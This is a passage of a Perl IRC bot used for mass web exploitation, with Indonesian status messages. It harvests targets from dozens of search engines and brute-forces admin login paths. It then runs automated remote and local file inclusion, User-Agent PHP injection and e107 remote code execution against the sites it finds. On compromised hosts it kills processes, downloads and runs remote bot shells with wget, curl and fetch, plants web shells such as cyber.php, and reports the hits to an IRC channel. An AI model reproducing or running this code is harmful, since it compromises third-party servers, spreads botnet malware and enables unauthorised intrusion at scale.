in/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','big
admin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','op
envpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','news
admin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/'
,'ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macad
min/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','S
uper-Admin/','dminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','p
hpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/'
,'database_administration/','power_user/','system_administration/','ss_vms_admin
_sm/',' --> Finish!!');
&msg("$path","15,1(4@9LOGIN15)13 Sear
ching Admin login for 4".$test."");
foreach $scan(@index){
$url = $test.$scan;
$request = HTTP::Request->new(GE
T=>$url);
$useragent = LWP::UserAgent->new
();
$response = $useragent->request(
$request);
if ($response->is_succes
s && $response->content =~ /Admin Area/ || $response->content =~ /Password/ || $
response->content =~ /welcome/ || $response->content =~ /admin area/ || $respons
e->content =~ /passwd/ || $response->content =~ /username/) {
$msg = "9Ok!!";
}
else { $msg = "4forbidden
!!";}
&msg("$path","15,1(4@9LOGIN15)13 $url
4$msg");
sleep 1;
}
}
exit;
}
}
if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"aXBheXMg=")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$rfilogo 9Dork :4 $dork");
&msg("$path","$rfilogo 13Bugz :4 $bug");
&msg("$path","$rfilogo 8eXp[C]rEw Telah Siap Dengan P
eralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,1);
} else {
&msg("$path","$rfilogo 4PHP Shell Slow Down!!!!");
}
}
exit;
}

}
if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"aXBheXMg=")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$lfilogo 9Dork :4 $dork");
&msg("$path","$lfilogo 13Bugz :4 $bug");
&msg("$path","$lfilogo 8eXp[C]rEw Telah Siap Deng
an Peralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,2);
} else {
&msg("$path","$lfilogo 4PHP Shell Slow Down!!!!")
;
}
}
exit;
}
}
if ($msg=~ /^$e107cmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"aXBheXMg=")) {
my ($bug,$dork) = ("contact.php",$1);
&msg("$path","$e107logo 9Dork :4 $dork");
&msg("$path","$e107logo 13Bugz :4 $bug");
&msg("$path","$e107logo 8eXp[C]rEw Telah Siap Den
gan Peralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,3);
} else {
&msg("$path","$e107logo 4PHP Shell Slow Down!!!!"
);
}
}
exit;
}
}
if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) {
exit; } else {
if (&isFound($injector,"aXBheXMg=")) {
my ($bug,$dork) = ($1,$2);
&msg("$path","$xmllogo 9Dork :4 $dork");
&msg("$path","$xmllogo 13Bugz :4 $bug");
&msg("$path","$xmllogo 8eXp[C]rEw Telah Siap Deng
an Peralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,4);
} else {

&msg("$path","$xmllogo 4PHP Shell Slow Down!!!!")


;
}
}
exit;
}
}
if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$sqllogo 9Dork :4 $dork");
&msg("$path","$sqllogo 13Bugz :4 $bug");
&msg("$path","$sqllogo 8eXp[C]rEw Telah Siap Dengan P
eralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,5);
}
exit;
}
}
if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"aXBheXMg=")) {
my ($bug,$dork) = ("admin/categories.php/login.php",
$1);
&msg("$path","$oscologo 9 Dork :4 $dork");
&msg("$path","$oscologo 8 eXp[C]rEw Telah Siap Dengan
Peralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,6);
} else {
&msg("$path","$oscologo 4PHP Shell Slow Down!!!!");
}
}
exit;
}
}
if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"aXBheXMg=")) {
my ($bug,$dork) = ("admin/file_manager.php/login.php
",$1);
&scan_start($path,$bug,$dork,$engine,12);
} else {
&msg("$path","$oscologo 4PHP Shell Slow Down!!!!");
}
}

exit;
}
}
if ($msg=~ /^$ossqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$ossqllogo 9Dork :4 $dork");
&msg("$path","$ossqllogo 13Bugz :4 $bug");
&msg("$path","$ossqllogo 8eXp[C]rEw Telah Siap Dengan
Peralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,10);
}
exit;
}
}
if ($msg=~ /^$oscocmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
if (&isFound($injector,"aXBheXMg=")) {
my ($bug,$dork) = ("admin/banner_manager.php/login.p
hp",$1);
&msg("$path","$oscologo 9 Dork :4 $dork");
&msg("$path","$oscologo 8 eXp[C]rEw Telah Siap Dengan
Peralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,11);
} else {
&msg("$path","$oscologo 4PHP Shell Slown Down!!!!");
}
}
exit;
}
}
if ($msg=~ /^$esqlcmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("contact.php",$1);
&msg("$path","$e107logosql 9Dork :4 $dork")
&msg("$path","$e107logosql 8eXp[C]rEw Telah Siap Deng
an Peralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,13);
}
exit;
}
}
if ($msg=~ /^$admcmd\s+(.*)/) {
if (my $pid = fork) {

waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("phpMyAdmin/config/config.inc.php
",$1);
&msg("$path","$admlogo 9 Dork :4 $dork");
&msg("$path","$admlogo 8 eXp[C]rEw Telah Siap Dengan P
eralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,7);
}
exit;
}
}
if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$oplogo 9Dork :4 $dork");
&msg("$path","$oplogo 13Bugz :4 $bug");
&msg("$path","$oplogo 8eXp[C]rEw Telah Siap Dengan Pe
ralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,8);
}
exit;
}
}
if ($msg=~ /^$zencmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("admin/sqlpatch.php/password_forg
otten.php?action=execute",$1);
&msg("$path","$zenlogo 9Dork :4 $dork");
&msg("$path","$zenlogo 8eXp[C]rEw Telah Siap Dengan P
eralatan Tempur!!!");
&scan_start($path,$bug,$dork,$engine,9);
}
exit;
}
}
if ($msg=~ /^$zencmd\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ("admin/record_company.php",$1);
&scan_start($path,$bug,$dork,$engine,9);
}
exit;
}

}
}
}
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line = $line_temp.$line if ($line_temp);
$line_temp = '';
$line =~ s/\r$//;
unless ($c == $#lines) {
&parse("$line");
} else {
if ($#lines == 0) {
&parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
&parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
&parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub type () {
my ($chan,$bug,$dork,$engine,$type) = @_;
if ($type == 1){&rfi($chan,$bug,$dork,$engine);}
elsif ($type == 2){&lfi($chan,$bug,$dork,$engine);}
elsif ($type == 3){&e107($chan,$bug,$dork,$engine);}
elsif ($type == 4){&xml($chan,$bug,$dork,$engine);}
elsif ($type == 5){&sql($chan,$bug,$dork,$engine);}
elsif ($type == 6){&osco($chan,$bug,$dork,$engine);}
elsif ($type == 12){&osco2($chan,$bug,$dork,$engine);}
elsif ($type == 7){&adm($chan,$bug,$dork,$engine);}
elsif ($type == 8){&op($chan,$bug,$dork,$engine);}
elsif ($type == 9){&zen($chan,$bug,$dork,$engine);}
elsif ($type == 10){&oscoQ($chan,$bug,$dork,$engine);}
elsif ($type == 11){&osco3($chan,$bug,$dork,$engine);}
elsif ($type == 13){&e107xpl($chan,$bug,$dork,$engine);}
}
sub scan_start() {
my ($chan,$bug,$dork,$engine,$type) = @_;
if ($engine =~ /google/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"GooGLe",$type);
} exit; }
}
if ($engine =~ /google2/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"GooGle2",$type);
} exit; }
}
if ($engine =~ /bing/i) {
if ($pid = fork) { waitpid($pid, 0); }

else { if (fork) { exit; } else {


&type($chan,$bug,$dork,"Bing",$type);
} exit; }
}
if ($engine =~ /altavista/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"ALtaViSTa",$type);
} exit; }
}
if ($engine =~ /ask/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"AsK",$type);
} exit; }
}
if ($engine =~ /uol/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"UoL",$type);
} exit; }
}
if ($engine =~ /yahoo/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"YahOo",$type);
} exit; }
}
if ($engine =~ /clusty/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"CluSty",$type);
} exit; }
}
if ($engine =~ /gutser/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"GutSer",$type);
} exit; }
}
if ($engine =~ /rediff/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"ReDiff",$type);
} exit; }
}
if ($engine =~ /virgilio/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"VirgiLio",$type);
} exit; }
}

if ($engine =~ /webde/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"WebDe",$type);
} exit; }
}
if ($engine =~ /exalead/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"ExaLead",$type);
} exit; }
}
if ($engine =~ /lycos/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"LyCos",$type);
} exit; }
}
if ($engine =~ /hotbot/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"HotBot",$type);
} exit; }
}
if ($engine =~ /aol/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"AoL",$type);
} exit; }
}
if ($engine =~ /sapo/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"SaPo",$type);
} exit; }
}
if ($engine =~ /duck/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"DuCk",$type);
} exit; }
}
if ($engine =~ /lygo/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"LyGo",$type);
} exit; }
}
if ($engine =~ /yause/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {

&type($chan,$bug,$dork,"YauSe",$type);
} exit; }
}
if ($engine =~ /baidu/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"BaiDu",$type);
} exit; }
}
if ($engine =~ /kipot/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"KiPoT",$type);
} exit; }
}
if ($engine =~ /gibla/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"GiBLa",$type);
} exit; }
}
if ($engine =~ /black/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"BLacK",$type);
} exit; }
}
if ($engine =~ /onet/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"oNeT",$type);
} exit; }
}
if ($engine =~ /sizuka/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"SiZuka",$type);
} exit; }
}
if ($engine =~ /walla/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"WaLLa",$type);
} exit; }
}
if ($engine =~ /demos/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"DeMos",$type);
} exit; }
}

if ($engine =~ /rose/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"RoSe",$type);
} exit; }
}
if ($engine =~ /seznam/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"SeZnaM",$type);
} exit; }
}
if ($engine =~ /tiscali/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"TisCali",$type);
} exit; }
}
if ($engine =~ /naver/i) {
if ($pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&type($chan,$bug,$dork,"NaVeR",$type);
} exit; }
}
}
sub rfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$rfilogo(4@3
$engine15)10 Scan finish"); }
my $coba = "http://".$site.$bug."test??";
my $test = "http://".$site.$bug.$injector."??";
my $dor = "http://".$site.$bug.$botshell."??";
my $dor2 = "http://".$site.$bug.$botshell2."??"
;
my $cek = &get_content($coba);sleep(1);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
if ($cek =~ /failed to open stream/i) {
if (my $pid = fork) { waitpid($pid, 0);
} else { if (fork) { exit; } else {
&rfi_xpl($test,$chan,$site);
exit;}
}
}
}
}
}

sub rfi_xpl() {
my $url
= $_[0];
my $chan = $_[1];
my $site = $_[2];
my $dor = $url.$botshell."??";
my $dor2 = $url.$botshell2."??";
my $test = $url.$injector2."??";
my $vuln = $url."14(gCYBER)";
my $check = &get_content($test);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
if ( $check =~ /ipays - exploit/i ) {
my $safe ="";
my $os
="";
my $free ="";
if ($check =~ m/Software : (.*?)<\/u><\/b><\/a><br>/) {$soft = $1;}
if ($check =~ m/SAFE MODE is (.*?)<\/b><\/font>/) {$safe = $1;}
if ($check =~ m/OS : (.*?)<br>/) {$os = $1;}
if ($check =~ m/Freespace : (.*?)<\/p><\/td><\/tr>/) {$free = $1;}
&msg("$chan","$rfilogo(4@3VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15O
S= $os9)(4@15FreeSpace= $free9)(4@9safemode-off15)");
&msg("$admin","$rfilogo(4@3VuLn15)13 ".$vuln."9(4@15SafeMode= $safe9)(4@15
OS= $os9)(4@15FreeSpace= $free9)");
}
else {&msg("$chan","$rfilogo(4@3VuLn15)10 ".$vuln." (4@7safemode-on15)")
;}
}
sub lfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$lfilogo(4@3$engine15)10 Scan fini
sh"); }
my $dir = "../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
my $vuln = "http://".$site."12".$bug.$dir."/proc/self/environ%0000";
my $shell = "http://".$site."12".$bug.$dir."/tmp/edank%0000";
my $html = &get_content($test);
if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exi
t; } else {
my $code = 'echo "c0li#".php_uname()."#c0li".get_current_use
r();if(@copy("'.$injector.'","/tmp/edank")) { echo "SUCCESS";@copy("'.$botshell.
'","/tmp/dev");@copy("'.$botshell2.'","/tmp/linux"); }';
my $res = lfi_env_query($test,encode_base64($code));
&lfi_spread_query($test);
&get_content("http://".$site.$bug.$dir."/tmp
/dev%0000");
&get_content("http://".$site.$bug.$dir."/tmp
/cyber%0000");
$res =~ s/\n//g;

if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
my $sys = $1;
$nob0dy = $2;
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".$shell."
15(4@9".$sys."15))15(4@9$nob0dy15)");
&msg("$admin","$lfilogo(4@3$engine1
5)15(4@9SHeLL15)13 ".$shell." 15(4@9".$sys."15))15(4@9$nob0dy15)");
sleep(2);}
elsif ($res =~ /c0li#(.*)#c0li(.*)/sg) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (for
k) { exit; } else {
my $sys = $1;
$nob0dy = $2;
my $upload = 'system("killall -9 perl;killall -9 php
;wget '.$injector.' -O cyber.php;fetch '.$injector.';mv darwin.jpg cyber.php;wge
t '.$botshell.' -O sign.php;fetch '.$botshell.';mv cached.jpg sign.php;wget '.$b
otshell2.' -O cron.php;fetch '.$botshell2.';mv cached.jpg cron.php;");passthru("
killall -9 perl;killall -9 php;wget '.$injector.' -O cyber.php;fetch '.$injector
.';mv darwin.jpg cyber.php;wget '.$botshell.' -O sign.php;fetch '.$botshell.';mv
cached.jpg sign.php;wget '.$botshell2.' -O cron.php;fetch '.$botshell2.';mv cac
hed.jpg cron.php;");';
my $wget = lfi_env_query($test,encode_base64($upload
)); sleep(2);
my $check = &get_content("http://".$site.$bug.$dir."
/tmp/edank%0000"); sleep(2);
&get_content("http://".$site.$bug.$dir."
/tmp/dev%0000");sleep(2);
&get_content("http://".$site.$bug.$dir."
/tmp/cyber%0000");sleep(2);
if ($check =~ /ipays - exploit/) {
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".
$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
&msg("$admin","$lfilogo(4@3$engine15)15(4@9SHeLL15)13 ".
$shell." 15(4@3".$sys."15)15(4@9$nob0dy15)");sleep(2);
}
else {
&msg("$chan","$lfilogo(4@3$engine15)15(4@9SysTem15)7 ".$
vuln." 15(4@3".$sys."15))15(4@9$nob0dy15)");sleep(2);
}
} exit; }
}
else { &msg("$chan","$lfilogo(4@3$engine15)15(4@9EnviRon15)10 ".$vul
n); }
} exit; } sleep(2);
}
}
}
}
sub lfi_env_query() {
my $url = $_[0];
my $code = $_[1];
my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".$code."'));?>
");
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}

sub lfi_spread_query() {
my $url = $_[0];
my $code = "system('cd /tmp;rm -rf dor.* *.jpg.*;fetch ".$botshell.";php cac
hed.jpg;rm -rf cached.jpg;wget ".$botshell.";php cached.jpg;rm -rf cached.jpg;cu
rl -O ".$botshell.";php cached.jpg;rm -rf cached.jpg;lwp-download ".$botshell.";
php cached.jpg;fetch ".$botshell2.";php cached.jpg;rm -rf cached.jpg;wget ".$bot
shell2.";php cached.jpg;rm -rf cached.jpg;curl -O ".$botshell2.";php cached.jpg;
rm -rf cached.jpg;lwp-download ".$botshell2.";php cached.jpg;cd /var/tmp;fetch "
.$botshell.";php cached.jpg;rm -rf cached.jpg;wget ".$botshell.";php cached.jpg;
rm -rf cached.jpg;curl -O ".$botshell.";php cached.jpg;rm -rf cached.jpg;lwp-dow
nload ".$botshell.";php cached.jpg;fetch ".$botshell2.";php cached.jpg;rm -rf ca
ched.jpg;wget ".$botshell2.";php cached.jpg;rm -rf cached.jpg;curl -O ".$botshel
l2.";php cached.jpg;rm -rf cached.jpg;lwp-download ".$botshell2.";php cached.jpg
;rm -rf *.jp*;');";
my $ua = LWP::UserAgent->new(agent => "<?eval(base64_decode('".encode_base64
($code)."'));?>");
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
}
sub e107() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$e107logo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$e107logo(4@3$engine15)10 Scan fin
ish"); }
my $test = "http://".$site.$bug;
my $code = "ZWNobyAiZVhwQ3JFdzxicj4iOw0KZWNobyAic3lzOiIucGhwX3VuYW1l
KCkuIjxicj4iOw0KJGNtZD0iZWNobyBub2IwZHlDckV3IjsNCiRlc2VndWljbWQ9ZXgoJGNtZCk7DQpl
Y2hvICRlc2VndWljbWQ7DQpmdW5jdGlvbiBleCgkY2ZlKXsNCiRyZXMgPSAnJzsNCmlmICghZW1wdHko
JGNmZSkpew0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpew0KQGV4ZWMoJGNmZSwkcmVzKTsNCiRy
ZXMgPSBqb2luKCJcbiIsJHJlcyk7DQp9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzaGVsbF9leGVj
Jykpew0KJHJlcyA9IEBzaGVsbF9leGVjKCRjZmUpOw0KfQ0KZWxzZWlmKGZ1bmN0aW9uX2V4aXN0cygn
c3lzdGVtJykpew0KQG9iX3N0YXJ0KCk7DQpAc3lzdGVtKCRjZmUpOw0KJHJlcyA9IEBvYl9nZXRfY29u
dGVudHMoKTsNCkBvYl9lbmRfY2xlYW4oKTsNCn0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3Bhc3N0
aHJ1Jykpew0KQG9iX3N0YXJ0KCk7DQpAcGFzc3RocnUoJGNmZSk7DQokcmVzID0gQG9iX2dldF9jb250
ZW50cygpOw0KQG9iX2VuZF9jbGVhbigpOw0KfQ0KZWxzZWlmKEBpc19yZXNvdXJjZSgkZiA9IEBwb3Bl
bigkY2ZlLCJyIikpKXsNCiRyZXMgPSAiIjsNCndoaWxlKCFAZmVvZigkZikpIHsgJHJlcyAuPSBAZnJl
YWQoJGYsMTAyNCk7IH0NCkBwY2xvc2UoJGYpOw0KfX0NCnJldHVybiAkcmVzOw0KfQ==";
my $html = &e107_rce_query($test,$code);
if ($html =~ /eXpCrEw<br>sys:(.+?)<br>nob0dyCrEw/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exi
t; } else {
my $sys = $1;
my $upload = 'if(@copy("'.$injector.'","cyber.php")) { echo
"c0liSUKSESc0li";@copy("'.$botshell.'","sign.php");@copy("'.$botshell2.'","cron.
php");} elseif(@copy("'.$injector.'","e107_themes/cyber.php")) { echo "INTER_dth
em";@copy("'.$botshell.'","e107_themes/sign.php");@copy("'.$botshell2.'","e107_t
hemes/cron.php");} elseif(@copy("'.$injector.'","e107_plugins/cyber.php")) { ech
o "INTER_dplug";@copy("'.$botshell.'","e107_plugins/sign.php");@copy("'.$botshel
l2.'","e107_plugins/cron.php");} elseif(@copy("'.$injector.'","e107_images/cyber
.php")) { echo "INTER_dima";@copy("'.$botshell.'","e107_images/sign.php");@copy(

"'.$botshell2.'","e107_images/cron.php");}';
my $res = &e107_rce_query($test,encode_base64($upload));
if ($res =~ /c0liSUKSESc0li/) {
&get_content("http://".$site."si
gn.php");
&get_content("http://".$site."cr
on.php");
&e107xpl1($chan,$site,$engine);
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".
$site."4cyber.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".
$site."4cyber.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /INTER_dthem/) {
&get_content("http://".$site."e1
07_themes/sign.php");
&get_content("http://".$site."e1
07_themes/cron.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".$
site."e107_themes/4cyber.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".
$site."e107_themes/4cyber.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /INTER_dplug/) {
&get_content("http://".$site."e1
07_plugins/sign.php");
&get_content("http://".$site."e1
07_plugins/cron.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".
$site."e107_plugins/4cyber.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".
$site."e107_plugins/4cyber.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
elsif ($res =~ /INTER_dima/) {
&get_content("http://".$site."e1
07_images/sign.php");
&get_content("http://".$site."e1
07_images/cron.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".
$site."e107_images/4cyber.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
&msg("$admin","$e107logo(4@3$engine15)15(4@9SheLL15)13 http://".
$site."e107_images/4cyber.php 15(4@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
else {
&msg("$chan","$e107logo(4@3$engine15)15(4@9Vuln15)7 ".$test." 15(4
@3".$sys."15)(4@9safemode-off15)");sleep(2);
}
&e107_spread_query($test);
sleep(2);
} exit; } sleep(2);
}
elsif ($html =~ /eXpCrEw<br>sys:(.+?)<br>/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exi
t; } else {
my $sys = $1;
my $upload = 'if(@copy("'.$injector.'","cyber.php")) { echo
"c0liSUKSESc0li";@copy("'.$botshell.'","sign.php");@copy("'.$botshell2.'","cron.
php");} elseif(@copy("'.$injector.'","e107_themes/cyber.php")) { echo "INTER_dth
em";@copy("'.$botshell.'","e107_themes/sign.php");@copy("'.$botshell2.'","e107_t
hemes/cron.php");} elseif(@copy("'.$injector.'","e107_plugins/cyber.php")) { ech

o "INTER_dplug";@copy("'.$botshell.'","e107_plugins/sign.php");@copy("'.$botshel
l2.'","e107_plugins/cron.php");} elseif(@copy("'.$injector.'","e107_images/cyber
.php")) { echo "INTER_dima";@copy("'.$botshell.'","e107_images/sign.php");@copy(
"'.$botshell2.'","e107_images/cron.php");}';
my $res = &e107_rce_query($test,encode_base64($upload));
if ($res =~ /c0liSUKSESc0li/) {
&e107xpl1($chan,$site,$engine);
&get_content("http://".$site."si
gn.php");
&get_content("http://".$site."cr
on.php");
&e107xpl1($chan,$site,$engine);
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$
site."4cyber.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /INTER_dthem/) {
&get_content("http://".$site."e1
07_themes/sign.php");
&get_content("http://".$site."e1
07_themes/cron.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$
site."e107_themes/4cyber.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /INTER_dplug/) {
&get_content("http://".$site."e1
07_plugins/sign.php");
&get_content("http://".$site."e1
07_plugins/cron.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$
site."e107_plugins/4cyber.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
if ($res =~ /INTER_dima/) {
&get_content("http://".$site."e1
07_images/sign.php");
&get_content("http://".$site."e1
07_images/cron.php");
&msg("$chan","$e107logo(4@3$engine15)15(4@9SheLL15)10 http://".$
site."e107_images/4cyber.php 15(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
else {
&msg("$chan","$e107logo(4@3$engine15)15(4@9Vuln15)10 ".$test." 15
(4@3".$sys."15)(4@7safemode-on15)");sleep(2);
}
} exit; } sleep(2);
}
}
}
}
sub e107_rce_query() {
my $url = $_[0];
